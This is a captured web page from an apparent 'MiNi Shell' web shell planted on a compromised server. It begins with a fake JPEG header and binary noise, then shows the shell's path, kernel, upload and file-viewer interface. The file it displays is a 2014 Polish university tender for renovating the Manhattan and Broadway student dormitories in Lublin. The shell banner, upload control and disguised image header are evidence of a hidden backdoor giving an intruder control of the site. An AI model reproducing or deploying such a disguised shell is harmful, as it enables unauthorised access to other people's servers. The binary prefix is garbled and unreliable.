JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140623/133713-N-2014.html

<p class="kh_header"><b>Lublin: Wykonanie robót remontowo - budowlanych oraz budowlano-instalacyjnych w domach studenckich Manhattan przy ul. Dobrzańskiego 33 w Lublinie oraz Broadway przy ul. Dobrzańskiego 35 w Lublinie,  z podziałem na 3 części.</b><br>
<b>Numer ogłoszenia: 133713 - 2014; data zamieszczenia: 23.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy w Lublinie , ul. Akademicka 13, 20-950 Lublin, woj. lubelskie, tel. 081 4456603, 4456073, faks 081 4456730.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ar.lublin.pl/zamowienia</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowo - budowlanych oraz budowlano-instalacyjnych w domach studenckich Manhattan przy ul. Dobrzańskiego 33 w Lublinie oraz Broadway przy ul. Dobrzańskiego 35 w Lublinie,  z podziałem na 3 części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót remontowo - budowlanych oraz budowlano-instalacyjnych w domach studenckich Manhattan przy ul. Dobrzańskiego 33 w Lublinie oraz Broadway przy ul. Dobrzańskiego 35 w Lublinie,  z podziałem na 3 części:
- część 1 -  wykonanie robót remontowych w pokojach na Ip., IIp., Vp,. oraz remont 10 kuchni od  Ip. do X p. w domu studenckim Manhattan przy ul. Dobrzańskiego 33 w Lublinie, w oparciu o: 
Opis przedmiotu zamówienia - zał. nr 1, w skład którego wchodzą:
a/ przedmiar robót - prace remontowo-budowlane - zał. nr 1 A,
b/ szczegółowa specyfikacja techniczna prac remontowo-budowlanych - zał. nr 1B,
c/ przedmiar robót - prace remontowo-malarskie na 1 p. i 2 p.  w ds. Manhattan - zał. nr 1 C,
d/ przedmiar robót - prace remontowo-malarskie na 5 p. -  zał. nr 1 D,
e/ szczegółowa specyfikacja techniczna prac remontowo-malarskich - zał. nr 1E,
f/ przedmiar robót - roboty remont instalacji elektrycznych w pokojach i węzłach sanitarnych na I, II i V piętrze oraz w jednym pionie budynku DS. Manhattan w Lublinie - zał. nr 1 F,
g/ szczegółowa specyfikacja techniczna  instalacji elektrycznych - zał. nr 1G,
h/ przedmiar robót - roboty rem- instalacji sanitarnych w 10 kuchniach - zał. nr 1 H,
i/ szczegółowa specyfikacja techniczna  instalacji sanitarnych - zał. nr 1I,
- część 2 - wykonanie robót remontowo-malarskich z wianą opraw oświetleniowych w pokojach i sanitariatach na III p., IV p., VI p. w domu studenckim. Manhattan przy ul. Dobrzańskiego 33  w Lublinie, w oparciu o: 
Opis przedmiotu zamówienia - zał. nr 2, w skład którego wchodzą:
a/ przedmiar robót - roboty remontowo - malarskie na III p., IV p., VI p. - zał. nr 2 A,
b/ szczegółowa specyfikacja techniczna robót remontowo -  malarskich - zał. nr 2B,
c/ przedmiar robót - roboty rem-instalacji elektrycznych w pokojach i węzłach sanitarnych na II,IV,VI piętrze - zał. nr 2 C,
d/ szczegółowa specyfikacja techniczna  instalacji elektrycznych - zał. nr 2D,
- część 3 - wykonanie robót remontowo-malarskich w pokojach na Ip. I IIp. Oraz remont 10 węzłów sanitarnych od I p do X p. (segmenty 101-104 - 1001-1004) w domu studenckim. Broadway przy ul. Dobrzańskiego 35  w Lublinie, w oparciu o: 
Opis przedmiotu zamówienia - zał. nr 3, w skład którego wchodzą:
a/ przedmiar robót - roboty remontowo - malarskie - zał. nr 3 A,
b/ szczegółowa specyfikacja techniczna robót remontowo -  malarskich - zał. nr 3B,
c/ przedmiar robót- prace remontowo-budowlane węzłów sanitarnych i przedpokoi - zał. nr 3 C,
d/ szczegółowa specyfikacja techniczna prac remontowo-budowlanych - zał. nr 3 D,
e/ przedmiar robót - roboty remont instalacji elektrycznych w pokojach i węzłach sanitarnych na I, II  piętrze oraz w jednym pionie budynku DS.Broadway w Lublinie - zał. nr 3E,
f/ szczegółowa specyfikacja techniczna  instalacji elektrycznych - zał. nr 3F,
g/ przedmiar robót - roboty remontowe węzłów sanitarnych  - zał. nr 3 G,
h/ szczegółowa specyfikacja techniczna  instalacji sanitarnych - zał. nr 3 H..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie części 1:
Wykonawca powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę  budowlaną  polegającą  na  wykonaniu  prac remontowo-budowlanych o wartości minimum 800 000,00 zł brutto (słownie: osiemset tysięcy złotych brutto).

w zakresie części 2:
Wykonawca powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną  polegającą  na  wykonaniu  prac remontowo-budowlanych o wartości minimum 500 000,00 zł brutto (słownie: pięćset tysięcy złotych brutto).

w zakresie części 3:
Wykonawca powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę  budowlaną  polegającą  na  wykonaniu  prac remontowo-budowlanych o wartości minimum 400 000,00 zł brutto (słownie: czterysta tysięcy złotych brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu oceny spełniania warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz Oferta Wykonawcy zgodnie ze wzorem stanowiącym załącznik nr 7 do SIWZ.
2. Informację na temat zakresu prac powierzonego podwykonawcom, na formularzu Podwykonawcy, zgodnym z treścią załącznika nr 9 do SIWZ.
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
3.  Kosztorysy ofertowe  sporządzone  metodą  szczegółową w 3 branżach  (budowlanej, sanitarnej, elektrycznej).
4. W przypadku, gdy oferta nie będzie podpisana przez osobę/y wskazaną/e w KRS lub centralnej ewidencji i informacji o działalności gospodarczej należy ustanowić pełnomocnika, a pełnomocnictwo do reprezentowania Wykonawcy winno być dołączone do oferty w formie oryginału lub kopii poświadczonej notarialnie.
5. Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się zmiany postanowień umowy w stosunku do treści oferty w zakresie:
   1/ terminu wykonania umowy w przypadku:
a/ opóźnienia Zamawiającego w przekazaniu terenu budowy, o ilość dni równą liczbie dni opóźnienia,
b/ opóźnienia Zamawiającego w przeprowadzeniu prawidłowo zgłoszonego przez Wykonawcę odbioru końcowego robót,
c/ wystąpienia siły wyższej uniemożliwiającej terminową realizację umowy, przy czym za siłę wyższą przyjmuje się zdarzenie, które pozostaje poza kontrolą strony umowy, zdarzenie zewnętrzne, któremu nie można zapobiec oraz które wyróżnia się nadzwyczajnym charakterem np. gwałtowne zjawiska przyrodnicze o charakterze katastrof oraz nadzwyczajne zaburzenia życia społecznego, w szczególności:  katastrofy żywiołowe, w szczególności huragany, trzęsienia ziemi, powódź, strajk z wyłączeniem wewnętrznego w firmie Wykonawcy, wprowadzenie stanu wojennego, akty terroryzmu,
   2/ wartości umowy brutto, o której mowa § 3 ust. 1 w przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, wprowadzonych na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia umowy, wynagrodzenie Wykonawcy może ulec odpowiednio zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek podatku VAT ulega zmianie kwota należnego podatku oraz łączne wynagrodzenie Wykonawcy  uwzględniające ten podatek. 
2. Zmiana wartości umowy, o której mowa w ust. 1 pkt 2 nie wymaga zawarcia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://up.lublin.pl/szp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja ds. Zamówień Publicznych Uniwersytet Przyrodniczy w Lublinie, ul. Akademicka 13 pokój 54 20-950 Lublin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 10:00, miejsce: Sekcja ds. Zamówień Publicznych Uniwersytet Przyrodniczy w Lublinie, ul. Akademicka
13 pokój 54 20-950 Lublin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie robót remontowych w pokojach na Ip., IIp., Vp,. oraz remont 10 kuchni od  Ip. do X p. w domu studenckim Manhattan przy ul. Dobrzańskiego 33 w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie robót remontowych w pokojach na Ip., IIp., Vp,. oraz remont 10 kuchni od  Ip. do X p. w domu studenckim Manhattan przy ul. Dobrzańskiego 33 w Lublinie, w oparciu o: 
Opis przedmiotu zamówienia - zał. nr 1, w skład którego wchodzą:
a/ przedmiar robót - prace remontowo-budowlane - zał. nr 1 A,
b/ szczegółowa specyfikacja techniczna prac remontowo-budowlanych - zał. nr 1B,
c/ przedmiar robót - prace remontowo-malarskie na 1 p. i 2 p.  w ds. Manhattan - zał. nr 1 C,
d/ przedmiar robót - prace remontowo-malarskie na 5 p. -  zał. nr 1 D,
e/ szczegółowa specyfikacja techniczna prac remontowo-malarskich - zał. nr 1E,
f/ przedmiar robót - roboty remont instalacji elektrycznych w pokojach i węzłach sanitarnych na I, II i V piętrze oraz w jednym pionie budynku DS. Manhattan w Lublinie - zał. nr 1 F,
g/ szczegółowa specyfikacja techniczna  instalacji elektrycznych - zał. nr 1G,
h/ przedmiar robót - roboty rem- instalacji sanitarnych w 10 kuchniach - zał. nr 1 H,
i/ szczegółowa specyfikacja techniczna  instalacji sanitarnych - zał. nr 1I,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie robót remontowo-malarskich z wianą opraw oświetleniowych w pokojach i sanitariatach na III p., IV p., VI p. w domu studenckim. Manhattan przy ul. Dobrzańskiego 33  w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie robót remontowo-malarskich z wianą opraw oświetleniowych w pokojach i sanitariatach na III p., IV p., VI p. w domu studenckim. Manhattan przy ul. Dobrzańskiego 33  w Lublinie, w oparciu o: 
Opis przedmiotu zamówienia - zał. nr 2, w skład którego wchodzą:
a/ przedmiar robót - roboty remontowo - malarskie na III p., IV p., VI p. - zał. nr 2 A,
b/ szczegółowa specyfikacja techniczna robót remontowo -  malarskich - zał. nr 2B,
c/ przedmiar robót - roboty rem-instalacji elektrycznych w pokojach i węzłach sanitarnych na II,IV,VI piętrze - zał. nr 2 C,
d/ szczegółowa specyfikacja techniczna  instalacji elektrycznych - zał. nr 2D,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie robót remontowo-malarskich w pokojach na Ip. I IIp. Oraz remont 10 węzłów sanitarnych od I p do X p. (segmenty 101-104 - 1001-1004) w domu studenckim. Broadway przy ul. Dobrzańskiego 35  w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie robót remontowo-malarskich w pokojach na Ip. I IIp. Oraz remont 10 węzłów sanitarnych od I p do X p. (segmenty 101-104 - 1001-1004) w domu studenckim. Broadway przy ul. Dobrzańskiego 35  w Lublinie, w oparciu o: 
Opis przedmiotu zamówienia - zał. nr 3, w skład którego wchodzą:
a/ przedmiar robót - roboty remontowo - malarskie - zał. nr 3 A,
b/ szczegółowa specyfikacja techniczna robót remontowo -  malarskich - zał. nr 3B,
c/ przedmiar robót- prace remontowo-budowlane węzłów sanitarnych i przedpokoi - zał. nr 3 C,
d/ szczegółowa specyfikacja techniczna prac remontowo-budowlanych - zał. nr 3 D,
e/ przedmiar robót - roboty remont instalacji elektrycznych w pokojach i węzłach sanitarnych na I, II  piętrze oraz w jednym pionie budynku DS.Broadway w Lublinie - zał. nr 3E,
f/ szczegółowa specyfikacja techniczna  instalacji elektrycznych - zał. nr 3F,
g/ przedmiar robót - roboty remontowe węzłów sanitarnych  - zał. nr 3 G,
h/ szczegółowa specyfikacja techniczna  instalacji sanitarnych - zał. nr 3 H..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com